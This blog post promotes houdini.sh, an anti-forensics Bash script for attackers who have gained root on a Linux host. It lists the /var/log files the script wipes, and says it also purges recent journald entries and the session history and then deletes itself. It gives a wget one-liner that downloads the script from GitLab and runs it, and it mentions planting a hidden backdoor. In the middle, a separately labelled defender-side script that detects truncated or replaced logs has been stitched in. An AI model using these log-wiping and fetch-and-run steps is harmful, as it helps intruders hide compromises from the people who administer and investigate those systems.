Did you know that professional hackers are also excellent magicians?

Generally speaking, the pattern is always the same. You find a vulnerability, you exploit it, then comes the privilege escalation part. And that's it, you are root, master of the machine, and as you don't have time you install a backdoor somewhere, well hidden, to do what you want with this new machine later. And then... You log out! The first mistake has just been made.

Why? Well, because all the actions you just performed, from exploiting the vulnerability until the moment you became root, were secretly recorded in several files on the machine. It's a bit like dropping your ID in the living room during a successful burglary, isn't that a shame?

So to avoid this kind of situation, today I'm gonna talk about houdini.sh! A Bash script that will help you to cover the traces you left on the machine, and make them disappear with a single command, like a wizard!

But what exactly does houdini.sh do?

On Linux, each action performed is recorded in a dedicated folder, usually /var/log. Each service can have its own file inside to record any problem, which is very helpful for debugging but not good when we want to be discreet.

Here are the files that houdini.sh will clear:

/var/log/audit/audit.log # Audit TTY input

/var/log/auth.log # Authentication logs

/var/log/boot.log # System boot log

/var/log/cron.log # Crond logs

/var/log/faillog # Faillog records

/var/log/httpd # Apache access and error logs directory

/var/log/kern.log # Kernel logs

/var/log/lastlog # SSH Last Login

/var/log/lighttpd # Lighttpd access and error logs directory

/var/log/maillog # Mail server logs

/var/log/messages # General message and system related stuff

/var/log/mysqld.log # MySQL database server log file

/var/log/qmail # Qmail log directory

/var/log/secure # Authentication log

/var/log/system.log # System Log

/var/log/tallylog # Tally Log

/var/log/utmp # Login records file

/var/log/wtmp # Login records file

/var/log/yum.log # Yum command log file

But it will also delete the last 3 hours written to the journald journal, because journald stores log data in a binary format instead of a plaintext format.

Another function of houdini.sh is to make sure that all commands entered during the current SSH session are also deleted.

And finally the script itself will self-destruct. Neither seen nor known!

Practical, isn't it?
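
Seen from the defender's side, the file clearing described above leaves a measurable artifact: a log that is suddenly smaller than it was, or gone. The following is an added example, not part of houdini.sh or the original article, that records size and inode for the plain files in the list above and reports any that vanished, shrank or were replaced. The function names, the baseline format and the file name logwatch.sh are assumptions.

```sh
#!/bin/sh
# Added example (defender side), not from houdini.sh or the article.
# Function names and the baseline format are assumptions of this sketch.

# Plain files from the list above (directories such as httpd are left out).
WATCHED="audit/audit.log auth.log boot.log cron.log faillog kern.log lastlog
maillog messages mysqld.log secure system.log tallylog utmp wtmp yum.log"

# file_state ROOT REL: print "REL SIZE INODE", or nothing if the file is absent.
file_state() {
    f="$1/$2"
    [ -f "$f" ] || return 0
    size=$(wc -c < "$f" | tr -d ' ')
    inode=$(ls -i "$f" | awk '{print $1}')
    printf '%s %s %s\n' "$2" "$size" "$inode"
}

# snapshot ROOT BASELINE: record the current state of every watched file.
snapshot() {
    : > "$2"
    for rel in $WATCHED; do file_state "$1" "$rel" >> "$2"; done
}

# check ROOT BASELINE: print one finding per file that vanished, shrank,
# or kept its name but changed inode since the baseline was taken.
check() {
    root=$1
    while read -r rel old_size old_inode; do
        cur=$(file_state "$root" "$rel")
        if [ -z "$cur" ]; then echo "MISSING $rel"; continue; fi
        new_size=$(echo "$cur" | awk '{print $2}')
        new_inode=$(echo "$cur" | awk '{print $3}')
        if [ "$new_size" -lt "$old_size" ]; then
            echo "SHRUNK $rel $old_size->$new_size"
        elif [ "$new_inode" != "$old_inode" ]; then
            echo "REPLACED $rel"
        fi
    done < "$2"
}

# Usage: sh logwatch.sh snapshot /var/log /path/to/baseline
#        sh logwatch.sh check    /var/log /path/to/baseline
case "${1:-}" in snapshot|check) "$@" ;; esac
```

Log rotation also shrinks or replaces files, so compare findings against the logrotate schedule, and keep the baseline somewhere that root on the monitored host cannot rewrite.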

How to use

If the terminal is your magic wand then the incantation is the following:

wget https://gitlab.com/-/snippets/2150636/raw/main/houdini.sh && sh houdini.sh

And boom! You just disappeared and succeeded in your first magic trick 🧙

The script is open source and available on GitLab:


Use it wisely! On that note, I'm going back to practice new magic tricks!

Thanks for reading!
